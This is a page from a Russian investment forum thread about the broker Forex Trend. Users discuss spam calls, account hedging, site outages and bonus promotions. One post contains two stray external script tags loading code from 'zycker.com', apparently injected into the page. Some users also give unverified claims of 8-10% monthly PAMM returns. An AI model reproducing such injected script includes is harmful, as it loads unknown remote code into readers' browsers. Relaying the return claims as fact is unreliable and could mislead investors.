• Реклама: 💰 Пополни свой портфель с минимальной комиссией на Transfer24.pro
  • Добро пожаловать на инвестиционный форум!

Во всем многообразии инвестиций трудно разобраться. MMGP станет вашим надежным помощником и путеводителем в мире инвестиций. Только самые последние тренды, передовые технологии и новые возможности. 400 тысяч пользователей уже выбрали нас. Самые актуальные новости, проверенные стратегии и способы заработка. Сюда люди приходят поделиться своим опытом, найти и обсудить новые перспективы. 16 миллионов сообщений, оставленных нашими пользователями, содержат их бесценный опыт и знания. Присоединяйтесь и вы!

Впрочем, для начала надо зарегистрироваться!
  • 🐑 Моисей водил бесплатно. А мы платим, хотя тоже планируем работать 40 лет! Принимай участие в партнеской программе MMGP
  • 📝 Знаешь буквы и умеешь их компоновать? Платим. Дорого. Бессрочная акция от MMGP: "ОПЛАТА ЗА СООБЩЕНИЯ"

Forex Trend - fx-trend.com - Страница 263

Vitaly550

Специалист
Реакции
197
Поинты
0.000
Народ,подскажите, кому после регистраций в компаний forex-trend начали названивать на мобильный со скрытых номеров, сотрудники других подобных компаний с предложением вложить деньги в торговлю на фондовых рынках,форексе, а также положить деньги на доверенное управление. Зарегистрировался я в forex-trende в конце прошлой недели. И уже сегодня несколько раз мне звонили с такими предложениями. Почему я уверен что мой телефон попал от них:1.Все кто звонят предлагают услуги наподобие таких как в fx-trend. 2. Звонившие мне сотрудники знают что я интересуюсь памм-инвестициями, хотя данную информацию не знает никто ни в моем окружениями, и темболее другие сайты на котрых я зарегестрирован.
Очень жаль что моё знакомство с компанией началось с такого!
регистрировался в форекстренде весной 2013 - на следующий день пришло сообщение на мобильный с чем-то там от ммм - номер у меня с 2006 года, известен многим, и светился в разных местах, но совпадение какой-то осадок в глубине души оставило...

Den2000

МАСТЕР
Верифицирован
Реакции
2,343
Поинты
0.000
А что вдруг стало с вводом средств с карт сбербанка через иксчендж? Кто нибудь знает?
У них постоянно что-то меняется. Какие-то банки отключают, потом подключают вновь. Вероятно что-то подобное и в этот раз.
Но вообще с такими вопросами Вам лучше спросить в ветке самого обменника

xag197911

ТОП-МАСТЕР
Верифицирован
Реакции
3,290
Поинты
0.310
регистрировался в форекстренде весной 2013 - на следующий день пришло сообщение на мобильный с чем-то там от ммм - номер у меня с 2006 года, известен многим, и светился в разных местах, но совпадение какой-то осадок в глубине души оставило...

Давно так не ржал :lol: ФТ не сливает данные никому. Им это не выгодно.
А вообще ФТ сами делают прозвон. Но делают только по своей базе зарегистрированных. Кто зарегистрировался и не вложился или не завершил регистрацию.
Моему рефу недавно звонили. Звонила девочка какая то, приставилась Юлией. Спросила о возникших проблемах с регистрацией и уточнила, может ли она помочь их решить. Еще сказал, что номер с которого она звонила бесплатен, и на него можно звонить. Правда на сайте он не висит.
Видать после критики на форуме решили всерьез улучшить качество техподдерки.

Максимм

МАСТЕР
Реакции
1,130
Поинты
0.000
Акция стабильный курс изменилась. Стала более интересней и выгодней для инвесторов.

Фактически для новых инвесторов с Украины это бонус 10%.Очень удачная акция.

id-reznik

Специалист
Верифицирован
Реакции
2,659
Поинты
0.000
. Fx-trend, я так понимаю, лот 0.01 крутит у себя? То есть на вывод идет лот от 0.1?
Мини счета не перекрываются, как мне известно. Перекрывается ECN счет.
Есть еще глобальный вопрос качества исполнения и объема ликвидности в ECN. Подозреваю, даже для брокеров входящих в одну ECN условия могут разниться, но это уже магия дилинга и договорные отношения, недоступные для простых смертных.

Станис

Интересующийся
Реакции
8
Поинты
0.000
Скажите пожалуйста, почему нельзя торговать на FOREX если я являюсь временным резидентом США?
Спасибо

Про закон Додда-Франка слышали, принятый Обамой в 10 году? Он запрещает гражданам и компаниям проведение большинства операций на внебиржевом рынке ( в т.ч. форекс).

fxlionpromo

ТОП-МАСТЕР
Реакции
3,192
Поинты
1.050
Про закон Додда-Франка слышали, принятый Обамой в 10 году? Он запрещает гражданам и компаниям проведение большинства операций на внебиржевом рынке ( в т.ч. форекс).
за пределами своей страны
поэтому американцы только внутри своей страны торгуют, грубо говоря закон для того, чтобы деньги оставались в стране
а так в сша много форекс-компаний, торгуйте там на здоровье

venetonn

Профессионал
Реакции
268
Поинты
0.000
Мини счета не перекрываются, как мне известно.
Насколько мне известно, то мини счета тоже перекрываются (говорили в киевском офисе), только в том случае, когда суммарный обьем по сделкам становит минимум 0,1 лота. Насколько я понял, сделки менее 0,1 лота обслуживает сама компания.

Shalom

МАСТЕР
Реакции
1,857
Поинты
28.720
Насколько мне известно, то мини счета тоже перекрываются (говорили в киевском офисе), только в том случае, когда суммарный обьем по сделкам становит минимум 0,1 лота. Насколько я понял, сделки менее 0,1 лота обслуживает сама компания.

Возможно и большая лотность крутится внутри, просто компания может выводить суммарную позицию в которую влиты позиции по сотням трейдерам.

Ну типа такого варианта. 200 трейдеров продали евро, суммарная позиция 30 лотов, в это время 100 трейдеров купили евро, на 20 лотов. В итоге компания просто выведет продажу в 10 лотов на рынок.

wawawa

Интересующийся
Реакции
13
Поинты
0.000
Что с сайтом?
_http://ping-admin.ru/free_test/result/1392222478257d70k30hrxus9981r4y.html
upd: все, починили
<script src="//zycker.com/static/no-conflict.js"></script>
<script src="//zycker.com/static/no-conflict.js"></script>

Последнее редактирование:

kolomatic

МАСТЕР
Реакции
1,116
Поинты
0.000
Мне кажется, все идет на поставщиков любыми объемами. Зачем компании заморачиваться с этими копейками, обслуживать этот процесс, если поставщики давно работают с объемами 0.01. Иначе, была бы заметная разница в исполнении на мини и есн-счете. Пару лет назад, когда я переходил от мини к обычному, я не заметил никакой разницы. Хотя все это досужие домыслы, одному богу известно как там все варится на самом деле.

ddmaster

ТОП-МАСТЕР
Реакции
8,513
Поинты
0.000
Реакции
7
Поинты
0.000
Захожу в Пантеон, мои памм-счета, кликаю на любой, перехожу не в статистику счета а на страницу списка счетов.

Вообще, никто не заметил, что оба сайта работают очень медленно, отклик очень долгий? Нажал, ждешь пока обновиться. Конечно, же это скорее всего совпадение. Но для компаний, в которые вложено такое количество средств инвесторов, это просто непозволительно. Я не удивляюсь, когда захожу на сайт почты РФ и он не работает, но сюда же люди вложили средства и начинают переживать, когда такое происходит. "Извините, у нас были технические проблемы" - я считаю это вообще не должно катить с компанией такого масштаба.

добавлено через 7 минут
UPD: ссылки на памм-счета, в которые вложены средства оживли в ту же минуту что и сайт Forex Trend.

Последнее редактирование:

aspiez

ТОП-МАСТЕР
Реакции
3,339
Поинты
23.580
но сюда же люди вложили средства и начинают переживать, когда такое происходит.
А Вы за всех не говорите. Если Вы начинаете переживать из-за 2-ух минутного отсутствия сайта, то это не значит, что все так же переживают. Это интернет.

Реакции
7
Поинты
0.000
А Вы за всех не говорите. Если Вы начинаете переживать из-за 2-ух минутного отсутствия сайта, то это не значит, что все так же переживают. Это интернет.

А где Вы увидели, что я говорю за всех? Исключительно, за себя.
И больше смущает не недоступность ресурса в течении 15-20 минут, а сумма факторов, которая накладывает не очень приятное впечатление на компанию (хорошо, если ошибочно). В моем случае это сумма факторов:

а) медленная работа сайта, недоступность сайта (хотя такое вижу впервые).
б) куча грамматических ошибок на официальном форуме от представителей компании (ну это ведь элементарно, публикуете акцию, которую прочитает 1000 человек, загоните в ворд, поправьте ошибки, расставьте пробелы и т.д.)

в) уровень ответов техподдержки, несоблюдение элементарных правил делового общения, скорость обработки обращений.

Gambit7

Специалист
Реакции
148
Поинты
0.000
На данный момент помимо того что залил в ПАММы, оставил 5000 баксов в банке, теперь думаю вывести деньги из банка и залить их под акцию "Стабильный курс", уж очень эта акция манит =) Получается довольно хорошая прибыль, вывожу по курсу 8,6 получается примерно 43000 грн, затем заливаю эти деньги по курсу 8, и получается уже 5375 баксов, плюс к этому 6 % акции "лояльности" и плюс планирую порядка 8-10 % зарабатывать в месяц от вложений в ПАММы, по моему довольно хороший вариант выходит:))

Сверху Снизу